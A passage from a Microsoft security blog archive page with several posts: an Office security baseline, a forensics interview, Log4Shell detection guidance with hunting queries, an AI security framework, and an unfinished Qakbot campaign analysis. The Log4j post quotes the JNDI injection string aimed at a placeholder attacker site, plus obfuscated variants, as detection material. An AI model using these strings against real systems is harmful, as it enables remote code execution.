For immediate support, visit the Microsoft Security Response Center (MSRC) where you can report an issue and get guidance from the latest security reports and Microsoft Security Response Center blog posts.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post The final report on NOBELIUM’s unprecedented nation-state attack appeared first on Microsoft Security Blog.

Security baseline for Microsoft 365 Apps for enterprise, v2112

December 14th, 2021 No comments

Microsoft is pleased to announce the release of the recommended security configuration baseline settings for Microsoft 365 Apps for enterprise, version 2112. Please download the content from the Microsoft Security Compliance Toolkit, test the recommended configurations, and implement as appropriate.


 


This baseline builds on the previous Office baseline we released April 2021. The highlights of this baseline include:



  • Excel policy name change to “Macro Notification Settings” from “VBA Macro Notification Settings”. This was done in conjunction with adding the new policy to block Excel 4.0 macros.

  • Expanded macro protection isolating and blocking Excel 4.0 macros. The Excel team created a new policy: “Prevent Excel from running XLM macros”. In the Trust Center this is an additional check box in the Macros Tab. We are also blocking Excel 4.0 macros by default in Office version 2109 or later, starting with Current Channel (with other channels at a later time).

  • New attributes added to Administrative Template files (ADMX/ADML) for Microsoft 365 Apps for enterprise to easily identify Security baselines and the area the policies are helping to protect.

  • Name changes of GPOs included in this baseline – to align with Microsoft branding requirements we have modified the names of the GPOs included in this baseline, see below.


 


The recommended settings in this security baseline correspond with the administrative templates version 5263, released December 13, 2021.


 


Deployment options for the baseline


IT Admins can apply baseline settings in different ways. Depending on the method(s) chosen different registry keys will be written and they will be observed in order of precedence: Office cloud policies will override ADMX/Group Policies which will override end user settings in the Trust Center.


 



  • Cloud policies may be deployed with the Office cloud policy service for policies in HKCU.  Cloud policies apply to a user on any device accessing files in Office apps with their AAD account. In Office cloud policy service, you can filter the Recommendation column to display the current Security Baselines, and within each policy’s context pane the recommended baseline setting is set by default. Learn more about Office cloud policy service.

  • ADMX policies may be deployed with Microsoft Endpoint Manager (MEM) for both HKCU and HKLM policies. These settings are written to the same place as Group Policy, but managed from the cloud in MEM. There are two methods to create and deploy policy configurations: Administrative templates or the settings catalog.

  • Group Policy may be deployed with on premise AD DS to deploy Group Policy Objects (GPO) to users and computers. The downloadable baseline package includes importable GPOs, a script to apply the GPOs to local policy, a script to import the GPOs into Active Directory Group Policy, updated custom administrative template (SecGuide.ADMX/L) file, all the recommended settings in spreadsheet form and a Policy Analyzer rules file.


 


GPOs included in the baseline


Most organizations can implement the baseline’s recommended settings without any problems. However, there are a few settings that will cause operational issues for some organizations. We’ve broken out related groups of such settings into their own GPOs to make it easier for organizations to add or remove these restrictions as a set. The local-policy script (Baseline-LocalInstall.ps1) offers command-line options to control whether these GPOs are installed.


 


Note: Name change to “MSFT Microsoft 365 Apps v2112”. This GPO set includes “Computer” and “User” GPOs that represent the “core” settings that should be trouble free, and each of these potentially challenging GPOs:


 



  • “DDE Block – User” is a User Configuration GPO that blocks using DDE to search for existing DDE server processes or to start new ones.

  • “Legacy File Block – User” is a User Configuration GPO that prevents Office applications from opening or saving legacy file formats.

  • “Legacy JScript Block – Computer” disables the legacy JScript execution for websites in the Internet Zone and Restricted Sites Zone.

  • “Require Macro Signing – User” is a User Configuration GPO that disables unsigned macros in each of the Office applications.


 


Disable Excel 4 Macros


A new Excel policy is available to block Excel 4.0 macros separate from VBA macros:  “Prevent Excel from running XLM macros”. With this new macro policy, choosing to disable XLM macros will no longer impact VBA macro settings. The setting is also available in the Trust Center for end users to modify. Therefore, to prevent end users changing the setting we recommend enabling the policy “Prevent Excel from running XLM macros”.


 


AREA and AREACATEGORY attributes in ADMX Templates


A new set of attributes has been introduced to allow policies to be tagged for specific scenarios such as Security Baseline, Security, Privacy, Accessibility, etc. These tags will power upcoming features to help admins identify policies by area for easier adoption. You’ll see these new columns in the spreadsheet documentation of the security baselines.


 


Example:


    <policy name=”L_AllowDDE” class=”User” Area=”Security Baseline” AreaCategory=”DDE” displayName=”$(string.L_AllowDDE)” explainText=”$(string.L_AllowDDEExplain)” presentation=”$(presentation.L_AllowDDE)” key=”software\policies\microsoft\office\16.0\word\security”>


 


When can I expect the next release of Microsoft 365 Apps for enterprise Security Baseline?


In the future, we’ll plan to release new security baselines every 6 months, usually in June and December.


 


If you have questions or issues, please let us know via the Security Baseline Community or this post.


 

Categories: Uncategorized Tags:

Researcher Spotlight: Dr. Nestori Syynimaa’s Constant Mission Protecting Identities

December 14th, 2021 No comments

“When you find the things I find, they really matter. They affect everybody’s security.” Currently streaming: The Expanse and Lost in Space on Netflix Currently listening to: Amorphis, Architects, and Killswitch Engage Currently running: 130 kilometers (or ~80 miles) a month Currently playing: Floorball (a type of floor hockey with five players and a goalkeeper) …

Researcher Spotlight: Dr. Nestori Syynimaa’s Constant Mission Protecting Identities Read More »

Categories: BlueHat Tags:

Your guide to mobile digital forensics

December 14th, 2021 No comments

The security community is continuously changing, growing, and learning from each other to better position the world against cyber threats. In the latest Voice of the Community blog series post, Microsoft Security Product Marketing Manager Natalia Godyla talks with Cellebrite Senior Director of Digital Intelligence Heather Mahalik. In this blog post, Heather talks about digital forensics, from technical guidance to hiring best practices, with a special focus on mobile forensics. 

Natalia: What is digital forensics and why is it important?

Heather: Cybersecurity is more about prevention, protection, and defense. Digital forensics is the response and is typically triggered by an incident. There are some people who say, “Oh no, we do things proactively.” For example, someone might be traveling to a foreign country, and they want to know if something is going to land on their mobile device. You may proactively scan or carry out forensics on that device before and then see what changed after. That would be a rare situation, but usually, it’s when an incident occurs and you need someone to come in and clean it up.

Natalia: How does mobile forensics differ from other forms of forensics?

Heather: Mobile forensics is fast-moving. Mobile device companies update devices and operating systems all the time. The applications we rely upon are updating. When I did digital forensics as a whole—computers, PC, and macOS—the updates weren’t the same as on mobile. There are also levels and encryption that keep us out, and they are different on every mobile device.

When I learned forensics in 2002, it was: “Here’s a hard drive. This is how the data is laid out. This is what you can expect every single time.” You can never expect the same thing every single time with mobile forensics. In every single case you work on, there will be a variance that requires you to learn something new. I love it because I can’t get bored, but it’s also frustrating. It’s so hard to say, “OK, I’m now a master.” You’re never a master of mobile forensics.

Natalia: What does the workflow for mobile forensics look like?

Heather: I always use the terminology cradle-to-grave forensics—you get it when it first starts, and you put it to rest with your report. If you are doing beginning to end, you’re starting with the mobile device in front of you. One thing to consider is remote access, which can be good and bad. Some of the third-party applications require that a device connects to a network to extract information, but that goes against everything you’ll read about forensics. Isolate from a network. Make sure it’s protected. No connections to the device.

The next phase is to acquire the data from the device, and there are many different tools and methods to do that. You need as much access to that file system as you can get because we need all the logs in the background to do a thorough analysis.

After that, I recommend triage. Consider how you’re going to solve the who, what, where, when, why, and how. Are there any clues that you can get immediately from that device? Then dive in deeper with your forensics and analytical tools.

Natalia: What’s the best way to approach an investigation?

Heather: There was a study where they had people work on the same case in different ways. One person was given the whole case scenario—“This is what we think happened”—and another person was just asked specific questions—“Please find these things.” In the middle is the best—“We are trying to solve for X. These are the questions that I think will help us get to X. Can you answer them?”

If other people start shooting holes in your report, you need additional evidence, and that’s usually what will force validation. If someone sees that report and they’re not fighting it, it’s because they know that it’s the truth.

Natalia: What common mistakes do forensics investigators make?

Heather: The biggest mistake I see is trusting what a forensics tool reports without validating the evidence. Think about your phone. Did the artifact sync from a computer that your roommate is using and now it’s on your phone? Is it a suggestion, like when you’re typing into a search browser and it makes recommendations? Is it a shared document that you didn’t edit? There are all these considerations of how the evidence got there. You should not go from extracting a phone to reporting. There is a big piece in between. Verify and validate with more than one method and tool before you put it in your report.

Natalia: Are forensics investigation teams typically in-house or consultants?

Heather: There could be both. It depends on how frequently you need someone. I’ve been a consultant to big companies that offer incident response services. They don’t typically see mobile incidents, so they wanted me there just in case. If you do hire one person, don’t expect them to be a master of mobile, macOS, PC, and network security.

If you’re doing incident response investigations, you want someone with incident response, memory forensics, and network forensics experience. In the environments I’ve been in, we need dead disk forensics experience, so we need people who are masters of PC, macOS, and mobile because it’s usually data at rest that’s collected. It’s more terrorism and crime versus ransomware and hacking. You must weigh what you’re investigating, and if it’s all those things—terrorism/crime and ransomware/hacking —you need a forensics team because it’s rare that people are on both sides of that spectrum and really good at both.

Natalia: What advice would you give a security leader looking to hire and manage a forensics team?

Heather: When hiring people, question what they know. I’ve worked at many places where I was on the hiring team, and someone would say, “If they have X certification, they can skip to the next level.” Just because I don’t have a certification doesn’t mean I don’t know it. You also don’t know how someone scored. Make sure it’s a good cultural fit as well because with what we do in forensics, you need to rely on your teammates to get you through some of the things you come across.

When it comes to skill-building, I recommend encouraging your team to play in any free Capture the Flag provided by vendors, like SANS Institute. An employer could even put people together and say, “I want you three to work together and see how you do.” Letting your employees take training that inspires them and makes them want to keep learning is important.

Natalia: I appreciate you mentioning the difficulties of the role. It’s important to openly discuss the mental health challenges of being an investigator. How do you handle what you find in your investigations? And how do tools, like DFIR review, help?

Heather: I lean on my coworkers a lot. Especially if it’s a big case—like a missing person, someone going to trial, or someone losing their job—it’s a lot of pressure on you. You need people who understand that pressure and help you leave it behind because if it’s constantly going through your mind, it’s not healthy.

Digital Forensics and Incident Response (DFIR) review came out about two years ago. I have put many of my whitepapers and research through the deeper review process because it’s a group of other experts that validate your work. That makes a lot of organizations feel comfortable. “I know this device was wiped on X date and someone tried to cover their tracks because Heather wrote a paper, and it was peer-reviewed, and it got the gold seal.” That relieves a lot of pressure.

Learn more

Explore Microsoft’s technical guidance to help build and implement cybersecurity strategy and architecture.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Your guide to mobile digital forensics appeared first on Microsoft Security Blog.

Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation

Microsoft’s unified threat intelligence team, comprising the Microsoft Threat Intelligence Center (MSTIC), Microsoft 365 Defender Threat Intelligence Team, RiskIQ, and the Microsoft Detection and Response Team (DART), among others, have been tracking threats taking advantage of CVE-2021-44228, a remote code execution (RCE) vulnerability in Apache Log4j 2 referred to as “Log4Shell”.

The vulnerability allows unauthenticated remote code execution, and it is triggered when a specially crafted string provided by the attacker through a variety of different input vectors is parsed and processed by the Log4j 2 vulnerable component. For more technical and mitigation information about the vulnerability, please read the Microsoft Security Response Center blog.

The bulk of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers. An example pattern of attack would appear in a web request log with strings like the following:

${jndi:ldap://[attacker site]/a}

An attacker performs a https request against their target system which generates a log using Log4j that leverages JNDI to perform a request to the attacker-controlled site. The vulnerability will then be to causes the exploited process to reach out to the site and execute the payload. In many observed attacks, the attacker-owned parameter is a DNS logging system, intended to log a request to the site to fingerprint the vulnerable systems.

The specially crafted string that enables execution of this vulnerability can be identified through several components. The string contains “jndi”, which refers to the Java Naming and Directory Interface. Following this, the protocol, such as “ldap”, “ldaps”, “rmi”, “dns”, “iiop”, or “http”, precedes the attacker domain.

As security teams work to detect the exploitation of the vulnerability, attackers have added obfuscation to these requests to evade detections based on request patterns. We’ve seen things like running a lower or upper command within the exploitation string ({jndi:${lower:l}${lower:d}a${lower:p}) and even more complicated obfuscation attempts (${${::-j}${::-n}${::-d}${::-i}) that are all trying to bypass string-matching detections.

At the time of publication, the vast majority of observed activity has been scanning, but exploitation and post-exploitation activities have also been observed. Based on the nature of the vulnerability, once the attacker has full access and control of an application, they can perform a myriad of objectives. Microsoft has observed activities including installing coin miners, Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems. 

Microsoft security solutions help protect against and detect attacks

Microsoft 365 Defender

Turn on cloud-delivered protection in Microsoft Defender Antivirus to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block the majority of new and unknown variants. Microsoft Defender Antivirus detects components and behaviors related to this threat as the following detection names:

On Windows:

  • Trojan:Win32/Capfetox.AA – detects attempted exploitation on the attacker machine
  • Trojan:Win64/DisguiseXMRigMiner – detection for coin mining post exploitation payloads
  • HackTool:Win32/Capfetox.A!dha – detects attempted exploitation on the attacker machine
  • VirTool:Win64/CobaltSrike.A, TrojanDropper:PowerShell/Cobacis.A – detects Cobalt Strike Beacon loaders

On Linux:

  • Trojan:Linux/SuspectJavaExploit.A, Trojan:Linux/SuspectJavaExploit.B, Trojan:Linux/SuspectJavaExploit.C – blocks Java processes downloading and executing payload through output redirection
  • Trojan:Linux/BashMiner.A – detects post-exploitation cryptocurrency miner
  • Exploit:Linux/CVE-2021-44228.A, Exploit:Linux/CVE-2021-44228.B – detects exploitation

Users of Microsoft Defender for Endpoint can turn on the following attack surface reduction rule to block or audit some observed activity associated with this threat.

  • Block executable files from running unless they meet a prevalence, age, or trusted list criterion

Due to the broad network exploitation nature of vectors through which this vulnerability can be exploited and the fact that applying mitigations holistically across large environments will take time, we encourage defenders to look for signs of post-exploitation rather than fully relying on prevention. Observed post exploitation activity such as coin mining, lateral movement, and Cobalt Strike are detected with behavior-based detections.

Alerts with the following titles in the Security Center can indicate threat activity on your network:

  • Possible Log4j exploitation
  • Suspicious script launched (detects multiple behaviors, including suspicious command launch post exploitation)

Microsoft 365 Defender advanced hunting queries

To locate possible exploitation activity, run the following queries:

Possible Malicious Indicators in Cloud Application Events

This query is designed to flag exploitation attempts for cases where the attacker is sending the crafted exploitation string using vectors such as User-Agent, Application or Account name. The hits returned from this query are most likely unsuccessful attempts, however the results can be useful to identity attackers’ details such as IP address, Payload string, Download URL, etc.

CloudAppEvents

| where Timestamp > datetime(“2021-12-09”)

| where UserAgent contains “jndi:” 

or AccountDisplayName contains “jndi:”

or Application contains “jndi:”

or AdditionalFields contains “jndi:”

| project ActionType, ActivityType, Application, AccountDisplayName, IPAddress, UserAgent, AdditionalFields

Possible vulnerable applications via M365D Threat and Vulnerability Management

This query looks for possibly vulnerable applications using the affected Log4j component. Please triage the results to determine applications and programs that may need to be patched and updated.

DeviceTvmSoftwareInventory

| where SoftwareName contains “log4j”

| project DeviceName, SoftwareName, SoftwareVersion

Screenshot of Threat and Vulnerability Management

Surfacing possibly vulnerable devices using Advanced Hunting

Finding possible vulnerable applications and devices via software inventory

Customers can also surface possibly vulnerable devices via Threat and Vulnerability Management capability in Microsoft Defender for Endpoint as part of Microsoft 365 Defender.

Screenshot of software inventory

Surfacing possibly vulnerable devices using Software Inventory

Microsoft Defender for Cloud

The following are the current Microsoft Defender for Cloud detections:

On Windows

  • Detected obfuscated command line
  • Suspicious use of PowerShell detected

On Linux

  • Suspicious file download
  • Possible Cryptocoinminer download detected
  • Process associated with digital currency mining detected
  • Potential crypto coin miner started

Microsoft Sentinel queries

Possible exploitation of Apache log4j component detected

This hunting query looks for possible attempts to exploit a remote code execution vulnerability in the Log4j component of Apache.  Attackers may attempt to launch arbitrary code by passing specific commands to a server, which are then logged and executed by the Log4j component.

Crypto currency miners EXECVE

This query hunts through EXECVE syslog data generated by AUOMS to find instances of crypto currency miners being downloaded.  It returns a table of suspicious command lines.

Microsoft Sentinel also provides a CVE-2021-44228 Log4Shell Research Lab Environment for testing the vulnerability: https://github.com/OTRF/Microsoft-Sentinel2Go/tree/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell

RiskIQ EASM and Threat Intelligence

View Threat Intelligence on this CVE, including mitigation guidance and IOCs, here. Both Community users and enterprise customers can search within the threat intelligence portal for data about potentially vulnerable components exposed to the Internet. For example, it’s possible to surface all observed instances of Apache or Java, including specific versions. Leverage this method of exploration to aid in understanding the larger Internet exposure, while also filtering down to what may impact you. 

For a more automated method, registered users can view their attack surface to understand tailored findings associated with their organization. Note, you must be registered with a corporate email and the automated attack surface will be limited. Digital Footprint customers can immediately understand what may be vulnerable and act swiftly and resolutely using the Attack Surface Intelligence Dashboard Log4J Insights tab. 

Azure Firewall Premium 

Customers using Azure Firewall Premium have enhanced protection from the Log4j RCE CVE-2021-44228 vulnerability and exploit. Azure Firewall premium IDPS (Intrusion Detection and Prevention System) provides IDPS inspection for all east-west traffic and outbound traffic to internet. The vulnerability rulesets are continuously updated and include CVE-2021-44228 vulnerability for different scenarios including UDP, TCP, HTTP/S protocols since December 10th, 2021. Below screenshot shows all the scenarios which are actively mitigated by Azure Firewall Premium.

Screenshot of Azure Firewall Premium

Recommendation: Customers are recommended to configure Azure Firewall Premium with both IDPS Alert & Deny mode and TLS inspection enabled for proactive protection against CVE-2021-44228 exploit.  

Customers using Azure Firewall Standard can migrate to Premium by following these directions. Customers new to Azure Firewall premium can learn more about Firewall Premium.

Indicators of compromise (IOCs)

Microsoft Threat Intelligence Center (MSTIC) has provided a list of IOCs related to this attack and will update them with new indicators as they are discovered:  https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Log4J_IPIOC_Dec112021.yaml

Microsoft will continue to monitor this dynamic situation and will update this blog as new threat intelligence and detections/mitigations become available.

The post Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation appeared first on Microsoft Security Blog.

Microsoft’s Response to CVE-2021-44228 Apache Log4j 2

December 12th, 2021 No comments

Published on: 2021 Dec 11 SUMMARY Microsoft is investigating the remote code execution vulnerability (CVE-2021-44228) related to Apache Log4j (a logging tool used in many Java-based applications) disclosed on 9 Dec 2021. As we and the industry at large continue to gain a deeper understanding of the impact of this threat, we will publish technical …

Microsoft’s Response to CVE-2021-44228 Apache Log4j 2 Read More »

Categories: Uncategorized Tags:

Best practices for AI security risk management

December 9th, 2021 No comments

Today, we are releasing an AI security risk assessment framework as a step to empower organizations to reliably audit, track, and improve the security of the AI systems. In addition, we are providing new updates to Counterfit, our open-source tool to simplify assessing the security posture of AI systems.

There is a marked interest in securing AI systems from adversaries. Counterfit has been heavily downloaded and explored by organizations of all sizes—from startups to governments and large-scale organizations—to proactively secure their AI systems. From a different vantage point, the Machine Learning Evasion Competition we organized to help security professionals exercise their muscles to defend and attack AI systems in a realistic setting saw record participation, doubling the amount of participants and techniques than the previous year.

This interest demonstrates the growth mindset and opportunity in securing AI systems. But how do we harness interest into action that can raise the security posture of AI systems? When the rubber hits the road, how can a security engineer think about mitigating the risk of an AI system being compromised?

AI security risk assessment framework

The deficit is clear: according to Gartner® Market Guide for AI Trust, Risk and Security Management published in September 2021, “AI poses new trust, risk and security management requirements that conventional controls do not address.1 To address this gap, we did not want to invent a new process. We acknowledge that security professionals are already overwhelmed. Moreover, we believe that even though the attacks on AI systems pose a new security risk, current software security practices are relevant and can be adapted to manage this novel risk. To that end, we fashioned our AI security risk assessment in the spirit of the current security risk assessment frameworks.

We believe that to comprehensively assess the security risk for an AI system, we need to look at the entire lifecycle of system development and deployment. An overreliance on securing machine learning models through academic adversarial machine learning oversimplifies the problem in practice. This means, to truly secure the AI model, we need to account for securing the entire supply chain and management of AI systems.

Through our own operations experience in building and red teaming models at Microsoft, we recognize that securing AI systems is a team sport. AI researchers design model architectures. Machine learning engineers build data ingestion, model training, and deployment pipelines. Security architects establish appropriate security policies. Security analysts respond to threats. To that end, we envisioned a framework that would involve participation from each of these stakeholders.

“Designing and developing secure AI is a cornerstone of AI product development at Boston Consulting Group (BCG). As the societal need to secure our AI systems becomes increasingly apparent, assets like Microsoft’s AI security risk management framework can be foundational contributions. We already implement best practices found in this framework in the AI systems we develop for our clients and are excited that Microsoft has developed and open sourced this framework for the benefit of the entire industry.”—Jack Molloy, Senior Security Engineer, BCG

As a result of our Microsoft-wide collaboration, our framework features the following characteristics:

  1. Provides a comprehensive perspective to AI system security. We looked at each element of the AI system lifecycle in a production setting: from data collection, data processing, to model deployment. We also accounted for AI supply chains, as well as the controls and policies with respect to backup, recovery, and contingency planning related to AI systems.
  2. Outlines machine learning threats and recommendations to abate them. To directly help engineers and security professionals, we enumerated the threat statement at each step of the AI system building process. Next, we provided a set of best practices that overlay and reinforce existing software security practices in the context of securing AI systems.
  3. Enables organizations to conduct risk assessments. The framework provides the ability to gather information about the current state of security of AI systems in an organization, perform gap analysis, and track the progress of the security posture.

Updates to Counterfit

To help security professionals get a broader view of the security posture of the AI systems, we have also significantly expanded Counterfit. The first release of Counterfit wrapped two popular frameworks—Adversarial Robustness Toolbox (ART) and TextAttack—to provide evasion attacks against models operating on tabular, image, and textual inputs. With the new release, Counterfit now features the following:

  • An extensible architecture that simplifies integration of new attack frameworks.
  • Attacks that include both access to the internals of the machine learning model and with just query access to the machine learning model.
  • Threat paradigms that include evasion, model inversion, model inference, and model extraction.
  • In addition to algorithmic attacks provided, common corruption attacks through AugLy are also included.
  • Attacks are supported for models that accept tabular data, images, text, HTML, or Windows executable files as input.

Learn More

These efforts are part of broader investment at Microsoft to empower engineers to securely develop and deploy AI systems. We recommend using it alongside the following resources:

  • For security analysts to orient to threats against AI systems, Microsoft, in collaboration with MITRE, released an ATT&CK style Adversarial Threat Matrix complete with case studies of attacks on production machine learning systems, which has evolved into MITRE ATLAS.
  • For security incident responders, we released our own bug bar to systematically triage attacks on machine learning systems.
  • For developers, we released threat modeling guidance specifically for machine learning systems.
  • For engineers and policymakers, Microsoft, in collaboration with Berkman Klein Center at Harvard University, released a taxonomy documenting various machine learning failure modes.
  • For security professionals, Microsoft open sourced Counterfit to help with assessing the posture of AI systems.
  • For the broader security community, Microsoft hosted the annual Machine Learning Evasion Competition.
  • For Azure machine learning customers, we provided guidance on enterprise security and governance.

This is a living framework. If you have questions or feedback, please contact us.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

 


1 Gartner, Market Guide for AI Trust, Risk and Security Management, Avivah Litan, et al., 1 September 2021 GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.

The post Best practices for AI security risk management appeared first on Microsoft Security Blog.

A closer look at Qakbot’s latest building blocks (and how to knock them down)

December 9th, 2021 No comments

Multiple Qakbot campaigns that are active at any given time prove that the decade-old malware continues to be many attackers’ tool of choice, a customizable chameleon that adapts to suit the needs of the multiple threat actor groups that utilize it. Since emerging in 2007 as a banking Trojan, Qakbot has evolved into a multi-purpose malware that provides attackers with a wide range of capabilities: performing reconnaissance and lateral movement, gathering and exfiltrating data, or delivering other payloads on affected devices.

Its modular nature allows Qakbot to persist in today’s computing landscape because it enables attackers to pick and choose the “building blocks” they need for each attack chain depending on the network environment the malware lands on. In many cases, the attackers who deliver Qakbot also sell access to affected devices to other threat actors, who use the said access for their own goals. For example, Qakbot infections have been known to lead to human-operated ransomware, including Egregor or Conti. Its impact, therefore, is far-reaching: based on our threat data, recent Qakbot activities are seen in several countries and territories across almost all the continents: Africa, Asia, Europe, and the Americas.

Qakbot’s modularity and flexibility could pose a challenge for security analysts and defenders because concurrent Qakbot campaigns could look strikingly different on each affected device, significantly impacting how these defenders respond to such attacks. Therefore, a deeper understanding of Qakbot is paramount in building a comprehensive and coordinated defense strategy against it.

Based on our research and analysis of three recent notable Qakbot campaigns, we break down a Qakbot attack chain into several distinct building blocks. Within each campaign, some of these building blocks are consistent, although not all will be observed. Knowing these details allows defenders to correctly identify related threats and attacks, regardless of their source. Such intelligence and insights also feed into Microsoft’s multi-layer protection technologies, like those delivered through Microsoft 365 Defender, to detect and block these threats at various stages of the attack chain.

This blog post provides technical details of each of the building blocks that comprise Qakbot campaigns. It also includes mitigation recommendations and advanced hunting queries to help defenders proactively surface this threat.

From email to ransomware: Breaking down a Qakbot campaign

Like other modular malware, Qakbot infections may look differently on each affected device, depending on the operator using the said malware and their deployment of the threat campaign. However, based on our analysis, one can break down a Qakbot-related incident into a set of distinct “building blocks,” which can help security analysts identify and respond to Qakbot campaigns. Figure 1 below represents these building blocks. From our observation, each Qakbot attack chain can only have one block of each color. The first row and the macro block represent the email mechanism used to deliver Qakbot.

Diagram showing components of Qakbot campaigns as building blocks

Figure 1. Qakbot attack chain “building blocks” observed

Certain building blocks within each campaign are consistent, but not all of them are observed on each affected device. As seen in a sample Qakbot campaign below (Figure 2), the top two rows represent the mechanisms adopted to deliver the malware on the three devices, while the succeeding ones are the activities it performs once running on each device. For instance, notice that Devices A and C were seen to have email exfiltration, while Device B was not:

Diagram showing building blocks making up different Qakbot campaigns

Figure 2. Sample differences among devices affected by a single Qakbot campaign

Therefore, from an analyst’s viewpoint, what Figure 2 implies is that even if email exfiltration was not observed in one device, it doesn’t mean that this routine didn’t happen at all in their organization’s network.

From our research, we identified ten building blocks, which we will discuss in the succeeding sections.

Email delivery

Qakbot is delivered via one of three email methods: malicious links, malicious attachments, or, more recently, embedded images.

The messages in these email campaigns typically consist of one- or two-sentence lures (for example, “please see attached” or “click here to view a file”). Such brevity provides sufficient information and a call to action for the target users but little for content security solutions to detect.

Screenshot of email with malicious URLs used in Qakbot campaign

Figure 3. Sample Qakbot campaign email message

Malicious links

The email campaigns we observed delivering Qakbot typically include the URLs that download the malware on target devices in the message body. Earlier this year, we began to observe that some of these URLs were missing the HTTP or HTTPS protocol, rendering them unclickable in most email clients. Therefore, to download the malware, target recipients had to manually enter the link into a browser.

Screenshot of email with unclickable links

Figure 4. Sample Qakbot campaign email containing an unclickable URL and fake-reply lure

Although the missing protocol poses a challenge for some email security solutions that detonate links through sandboxing, the extra step needed from targets to copy and paste the URL hinders the attack’s success rate. However, it should also be noted that what the messages sometimes lack in formatting, they make up for in the content by using fake-reply lures.

This fake-reply technique, which has already been seen in previous Qakbot and other major malware delivery campaigns, uses stolen subject lines and message content to construct a malicious reply to appear as part of a prior email thread. Qakbot is also known for reusing email threads exfiltrated from prior infections to create new templates for their next email campaign runs, allowing an attacker to use an actual subject line and message content to construct the spoofed reply. This increases the likelihood of target users clicking or copy-pasting the link because the message they receive from this campaign feels more expected. At the same time, attackers benefit from growing entropy among messages because no two emails in the same campaign will be alike. Unfortunately, such entropy also makes it more difficult for security analysts and defenders to fully scope a campaign.

Malicious attachments

Some Qakbot-related emails sent by attackers may include a ZIP file attachment. Within the ZIP is a spreadsheet containing Excel 4.0 macros.

The attachment name is meant to appear as an official corporate document to trick a target recipient into opening it. For example, between September and November this year, the naming patterns we observed for the attachment included but were not limited to the following:

  • CMPL-[digits]-[month]-[day].zip
  • Compensation_Reject-[digits]-[mmddyyyy].zip
  • Document_[digits]-[mmddyyyy].zip
  • Document_[digits]-Copy.zip
  • PRMS-[digits].zip
  • Rebate-[digits]-[mmddyyyy].zip
  • REF-[digits]-[month]-[day].zip
  • TXN-[digits].zip

Screenshot of email with malicious ZIP attachment

Figure 5. Sample Qakbot campaign email containing a ZIP attachment

Embedded images

In its third and most recent evolution, Qakbot arrives via an email message that only contains an embedded image in its body, a stark contrast to its previous delivery methods that used file attachments or direct hyperlinks. We uncovered this Qakbot campaign while investigating malware infections from malicious Excel files associated with emails that abuse Craigslist’s email messaging system to deliver malicious files—a routine first reported by INKY.

This campaign is more involved than previous Qakbot email campaigns because, unlike its previous delivery methods, the malicious components in the email (in this case, the malicious URL) are not in the message body as text but are contained instead within an image designed to look like the message body. The image instructs recipients to type the URL directly in their browser to download an Excel file that eventually leads to Qakbot.

The said image is a screenshot of text formatted to impersonate an automated Craigslist notification, and it informs the target recipient of a supposed policy infraction on their Craigslist posting. The said fake notification further instructs the user to enter a URL into a browser to access a form for more detailed information, threatening to delete their account if they don’t follow.

 Screenshot of email with image containing the malicious URL

Figure 6. Craigslist campaign email luring targets with an embedded image

Attackers crawl Craigslist ad posts to harvest email relay addresses, where they then send custom-crafted messages directly. The email relay receives the sent messages and removes personal data—including the sender’s actual email address, appends original post details to the end of the message, then forwards it through Craigslist infrastructure to mask the original sender. As a result, the ad owner will receive an anonymized email sent from the legitimate craigslist.org domain.

The attackers’ abuse of the email relay system allows them to remain anonymous and impersonate Craigslist. It also adds a sense of legitimacy to the messages because it comes from a popular domain that is generally deemed safe by traditional security solutions.

Based on our observation, this email campaign replies to job-related ads, which we believe is the attackers’ attempt to target recipients who open such types of messages while connected to a corporate network. However, based on our threat data, users’ success rate accessing the related malicious domains is relatively low. Such a result is likely because the campaign requires the target recipients to perform the additional step of typing a URL.

Macro enablement

Despite the varying email methods attackers are using to deliver Qakbot, these campaigns have in common their use of malicious macros in Office documents, specifically Excel 4.0 macros. It should be noted that while threats use Excel 4.0 macros as an attempt to evade detection, this feature is now disabled by default and thus requires users to enable it manually for such threats to execute properly.

Once the user downloads and opens the malicious Excel file, the text in the document attempts to lure them into enabling the macro. The said text claims that the file is “protected” by a service such as Microsoft or DocuSign, and that the user must enable the macro to view the document’s actual content.

Screenshot of malicious Excel file with lure to enable macros

Figure 7. XLS file with a DocuSign lure urging targets to enable macros

If the user goes ahead and enables the macro, Excel immediately checks if there is a subprocedure predefined in the macro to run automatically once the document opens; in this case, auto_open(). The Visual Basic for Applications (VBA) code written within this subprocedure creates a new macrosheet and then writes Excel 4.0 formulas in several of its cells. Next, it jumps to one cell in this sheet by calling the Application.Run method. In this way, the VBA code starts the Excel 4.0 macro code that was just written to the macrosheet.

Screenshot of malicious macro code

Figure 8. Example of an Excel 4.0 macro generated by the VBA script.

Generating and calling Excel 4.0 macro from VBA is an evasion technique to prevent static analysis tools from decoding the macro. When the user closes the document, the auto_close() function launches to clean up and remove the malicious macrosheet created by the VBA macro.

Qakbot delivery

Once macros are enabled, the next phase of the attack begins. First, the macro connects to a predefined set of IP addresses or domains to download the malicious files. Some macros are designed to connect to three domains simultaneously, downloading a file of the same name. This is likely done for one of two reasons: first, as a redundancy measure to ensure that the malware is still delivered even if one or two of the domains have been blocked or taken down; and second, to enable the attacker to deliver multiple payloads if desired.

Screenshot of malicious macro code for downloading payload

Figure 9. Portion of the generated Excel 4.0 macro that shows its attempts to download three payloads from three locations.

